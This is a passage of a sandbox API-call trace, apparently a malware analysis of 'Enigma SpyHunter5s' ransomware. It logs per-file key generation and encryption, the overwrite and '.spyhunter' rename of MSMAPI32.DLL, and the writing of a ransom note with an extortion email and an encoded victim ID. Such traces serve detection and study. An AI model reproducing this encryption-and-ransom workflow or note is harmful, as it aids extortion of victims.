dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0092.039] GetProcessHeap () returned 0x2c0000 [0092.039] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0092.039] GetProcessHeap () returned 0x2c0000 [0092.039] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x37e488 | out: hHeap=0x2c0000) returned 1 [0092.040] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270fc80 | out: pbBuffer=0x270fc80) returned 1 [0092.040] GetProcessHeap () returned 0x2c0000 [0092.040] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0092.040] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x270fc78*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x270fc78*=0x30) returned 1 [0092.040] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\en-US\\sqlxmlx.rll.mui" (normalized: "c:\\program files\\common files\\system\\ole db\\en-us\\sqlxmlx.rll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0092.040] GetProcessHeap () returned 0x2c0000 [0092.040] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0092.040] GetProcessHeap () returned 0x2c0000 [0092.040] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x37e710 | out: hHeap=0x2c0000) returned 1 [0092.040] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270fc78 | out: pbBuffer=0x270fc78) returned 1 [0092.040] GetProcessHeap () returned 0x2c0000 [0092.040] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0092.040] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x270fc70*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x270fc70*=0x30) returned 1 [0092.040] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\en-US\\sqloledb.rll.mui" (normalized: "c:\\program files\\common files\\system\\ole db\\en-us\\sqloledb.rll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0092.041] GetProcessHeap () returned 0x2c0000 [0092.041] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0092.041] GetProcessHeap () returned 0x2c0000 [0092.041] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x37e638 | out: hHeap=0x2c0000) returned 1 [0092.041] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270fc78 | out: pbBuffer=0x270fc78) returned 1 [0092.041] GetProcessHeap () returned 0x2c0000 [0092.041] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0092.041] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x270fc70*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x270fc70*=0x30) returned 1 [0092.041] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\MSMAPI\\1033\\MSMAPI32.DLL" (normalized: "c:\\program files\\common files\\system\\msmapi\\1033\\msmapi32.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x170 [0092.044] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\System\\MSMAPI\\1033\\MSMAPI32.DLL") returned 65 [0092.044] StrStrW (lpFirst="MSMAPI32.DLL", lpSrch=".txt") returned 0x0 [0092.044] GetProcessHeap () returned 0x2c0000 [0092.044] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x347830 [0092.044] ReadFile (in: hFile=0x170, lpBuffer=0x347830, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270fc34, lpOverlapped=0x0 | out: lpBuffer=0x347830*, lpNumberOfBytesRead=0x270fc34*=0x2800, lpOverlapped=0x0) returned 1 [0092.070] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0092.070] WriteFile (in: hFile=0x170, lpBuffer=0x347830*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x270fc34, lpOverlapped=0x0 | out: lpBuffer=0x347830*, lpNumberOfBytesWritten=0x270fc34*=0x2800, lpOverlapped=0x0) returned 1 [0092.071] GetProcessHeap () returned 0x2c0000 [0092.071] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x347830 | out: hHeap=0x2c0000) returned 1 [0092.071] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0092.071] WriteFile (in: hFile=0x170, lpBuffer=0x270fc74*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270fc34, lpOverlapped=0x0 | out: lpBuffer=0x270fc74*, lpNumberOfBytesWritten=0x270fc34*=0x4, lpOverlapped=0x0) returned 1 [0092.112] WriteFile (in: hFile=0x170, lpBuffer=0x31f020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270fc34, lpOverlapped=0x0 | out: lpBuffer=0x31f020*, lpNumberOfBytesWritten=0x270fc34*=0x30, lpOverlapped=0x0) returned 1 [0092.113] CloseHandle (hObject=0x170) returned 1 [0092.114] GetProcessHeap () returned 0x2c0000 [0092.114] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x30efc0 [0092.114] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\System\\MSMAPI\\1033\\MSMAPI32.DLL.spyhunter") returned 75 [0092.114] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\MSMAPI\\1033\\MSMAPI32.DLL" (normalized: "c:\\program files\\common files\\system\\msmapi\\1033\\msmapi32.dll"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\MSMAPI\\1033\\MSMAPI32.DLL.spyhunter" (normalized: "c:\\program files\\common files\\system\\msmapi\\1033\\msmapi32.dll.spyhunter")) returned 1 [0092.116] GetProcessHeap () returned 0x2c0000 [0092.116] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x30efc0 | out: hHeap=0x2c0000) returned 1 [0092.116] GetProcessHeap () returned 0x2c0000 [0092.116] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0092.116] GetProcessHeap () returned 0x2c0000 [0092.116] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x358610 | out: hHeap=0x2c0000) returned 1 [0092.116] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270fc70 | out: pbBuffer=0x270fc70) returned 1 [0092.116] GetProcessHeap () returned 0x2c0000 [0092.116] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0092.116] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x270fc68*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x270fc68*=0x30) returned 1 [0092.116] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\SecretST.TTF" (normalized: "c:\\program files\\dvd maker\\secretst.ttf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0092.116] GetProcessHeap () returned 0x2c0000 [0092.116] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0092.116] GetProcessHeap () returned 0x2c0000 [0092.116] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3514a8 | out: hHeap=0x2c0000) returned 1 [0092.116] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270fc70 | out: pbBuffer=0x270fc70) returned 1 [0092.117] GetProcessHeap () returned 0x2c0000 [0092.117] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0092.117] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x270fc68*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x270fc68*=0x30) returned 1 [0092.117] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\rtstreamsource.ax" (normalized: "c:\\program files\\dvd maker\\rtstreamsource.ax"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0092.117] GetProcessHeap () returned 0x2c0000 [0092.117] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0092.117] GetProcessHeap () returned 0x2c0000 [0092.118] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x33d210 | out: hHeap=0x2c0000) returned 1 [0092.118] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270fc68 | out: pbBuffer=0x270fc68) returned 1 [0092.118] GetProcessHeap () returned 0x2c0000 [0092.118] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0092.118] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x270fc60*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x270fc60*=0x30) returned 1 [0092.118] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\rtstreamsink.ax" (normalized: "c:\\program files\\dvd maker\\rtstreamsink.ax"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0092.119] GetProcessHeap () returned 0x2c0000 [0092.119] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0092.119] GetProcessHeap () returned 0x2c0000 [0092.119] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x330f38 | out: hHeap=0x2c0000) returned 1 [0092.119] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270fc68 | out: pbBuffer=0x270fc68) returned 1 [0092.119] GetProcessHeap () returned 0x2c0000 [0092.119] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0092.119] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x270fc60*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x270fc60*=0x30) returned 1 [0092.119] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\PipeTran.dll" (normalized: "c:\\program files\\dvd maker\\pipetran.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0092.120] GetProcessHeap () returned 0x2c0000 [0092.120] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0092.120] GetProcessHeap () returned 0x2c0000 [0092.120] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x351408 | out: hHeap=0x2c0000) returned 1 [0092.120] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270fc60 | out: pbBuffer=0x270fc60) returned 1 [0092.120] GetProcessHeap () returned 0x2c0000 [0092.120] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0092.120] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x270fc58*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x270fc58*=0x30) returned 1 [0092.120] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Pipeline.dll" (normalized: "c:\\program files\\dvd maker\\pipeline.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0092.120] GetProcessHeap () returned 0x2c0000 [0092.121] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0092.121] GetProcessHeap () returned 0x2c0000 [0092.121] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x351368 | out: hHeap=0x2c0000) returned 1 [0092.121] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270fc60 | out: pbBuffer=0x270fc60) returned 1 [0092.121] GetProcessHeap () returned 0x2c0000 [0092.121] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0092.121] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x270fc58*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x270fc58*=0x30) returned 1 [0092.121] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\OmdProject.dll" (normalized: "c:\\program files\\dvd maker\\omdproject.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0092.121] GetProcessHeap () returned 0x2c0000 [0092.121] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0092.121] GetProcessHeap () returned 0x2c0000 [0092.121] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x330e90 | out: hHeap=0x2c0000) returned 1 [0092.121] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270fc58 | out: pbBuffer=0x270fc58) returned 1 [0092.121] GetProcessHeap () returned 0x2c0000 [0092.121] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0092.121] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x270fc50*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x270fc50*=0x30) returned 1 [0092.121] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\OmdBase.dll" (normalized: "c:\\program files\\dvd maker\\omdbase.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0092.122] GetProcessHeap () returned 0x2c0000 [0092.122] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0092.122] GetProcessHeap () returned 0x2c0000 [0092.122] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3512c8 | out: hHeap=0x2c0000) returned 1 [0092.122] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270fc58 | out: pbBuffer=0x270fc58) returned 1 [0092.122] GetProcessHeap () returned 0x2c0000 [0092.122] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0092.122] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x270fc50*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x270fc50*=0x30) returned 1 [0092.122] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\offset.ax" (normalized: "c:\\program files\\dvd maker\\offset.ax"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0092.123] GetProcessHeap () returned 0x2c0000 [0092.123] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0092.123] GetProcessHeap () returned 0x2c0000 [0092.123] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x351228 | out: hHeap=0x2c0000) returned 1 [0092.123] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270fc50 | out: pbBuffer=0x270fc50) returned 1 [0092.123] GetProcessHeap () returned 0x2c0000 [0092.123] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0092.123] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x270fc48*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x270fc48*=0x30) returned 1 [0092.123] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\fieldswitch.ax" (normalized: "c:\\program files\\dvd maker\\fieldswitch.ax"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0092.123] GetProcessHeap () returned 0x2c0000 [0092.123] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0092.123] GetProcessHeap () returned 0x2c0000 [0092.123] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x330d40 | out: hHeap=0x2c0000) returned 1 [0092.123] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270fc50 | out: pbBuffer=0x270fc50) returned 1 [0092.124] GetProcessHeap () returned 0x2c0000 [0092.124] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0092.124] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x270fc48*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x270fc48*=0x30) returned 1 [0092.124] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Eurosti.TTF" (normalized: "c:\\program files\\dvd maker\\eurosti.ttf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0092.124] GetProcessHeap () returned 0x2c0000 [0092.124] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0092.124] GetProcessHeap () returned 0x2c0000 [0092.124] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x351048 | out: hHeap=0x2c0000) returned 1 [0092.124] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\en-US\\$HOWDECRYPT$.txt" (normalized: "c:\\program files\\dvd maker\\en-us\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x170 [0092.124] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0092.124] WriteFile (in: hFile=0x170, lpBuffer=0x270fb7f*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x270fca8, lpOverlapped=0x0 | out: lpBuffer=0x270fb7f*, lpNumberOfBytesWritten=0x270fca8*=0x127, lpOverlapped=0x0) returned 1 [0092.125] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0092.125] WriteFile (in: hFile=0x170, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x270fca8, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x270fca8*=0x2ac, lpOverlapped=0x0) returned 1 [0092.126] CloseHandle (hObject=0x170) returned 1 [0092.126] GetProcessHeap () returned 0x2c0000 [0092.126] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32a228 | out: hHeap=0x2c0000) returned 1 [0092.126] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270fc48 | out: pbBuffer=0x270fc48) returned 1 [0092.126] GetProcessHeap () returned 0x2c0000 [0092.126] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0092.126] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x270fc40*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x270fc40*=0x30) returned 1 [0092.126] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\en-US\\WMM2CLIP.dll.mui" (normalized: "c:\\program files\\dvd maker\\en-us\\wmm2clip.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0092.126] GetProcessHeap () returned 0x2c0000 [0092.126] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0092.126] GetProcessHeap () returned 0x2c0000 [0092.126] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32a170 | out: hHeap=0x2c0000) returned 1 [0092.127] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270fc40 | out: pbBuffer=0x270fc40) returned 1 [0092.127] GetProcessHeap () returned 0x2c0000 [0092.127] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0092.127] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x270fc38*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x270fc38*=0x30) returned 1 [0092.127] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\en-US\\OmdProject.dll.mui" (normalized: "c:\\program files\\dvd maker\\en-us\\omdproject.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0092.128] GetProcessHeap () returned 0x2c0000 [0092.128] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0092.128] GetProcessHeap () returned 0x2c0000 [0092.128] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32a0b8 | out: hHeap=0x2c0000) returned 1 [0092.128] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270fc40 | out: pbBuffer=0x270fc40) returned 1 [0092.128] GetProcessHeap () returned 0x2c0000 [0092.128] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0092.129] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x270fc38*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x270fc38*=0x30) returned 1 [0092.129] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\en-US\\DVDMaker.exe.mui" (normalized: "c:\\program files\\dvd maker\\en-us\\dvdmaker.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0092.129] GetProcessHeap () returned 0x2c0000 [0092.129] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0092.129] GetProcessHeap () returned 0x2c0000 [0092.129] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32a000 | out: hHeap=0x2c0000) returned 1 [0092.129] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270fc38 | out: pbBuffer=0x270fc38) returned 1 [0092.129] GetProcessHeap () returned 0x2c0000 [0092.129] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0092.129] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x270fc30*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x270fc30*=0x30) returned 1 [0092.129] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\DVDMaker.exe" (normalized: "c:\\program files\\dvd maker\\dvdmaker.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0092.129] GetProcessHeap () returned 0x2c0000 [0092.129] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0092.129] GetProcessHeap () returned 0x2c0000 [0092.129] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3510e8 | out: hHeap=0x2c0000) returned 1 [0092.130] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270fc38 | out: pbBuffer=0x270fc38) returned 1 [0092.130] GetProcessHeap () returned 0x2c0000 [0092.130] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0092.130] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x270fc30*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x270fc30*=0x30) returned 1 [0092.130] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\directshowtap.ax" (normalized: "c:\\program files\\dvd maker\\directshowtap.ax"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0092.131] GetProcessHeap () returned 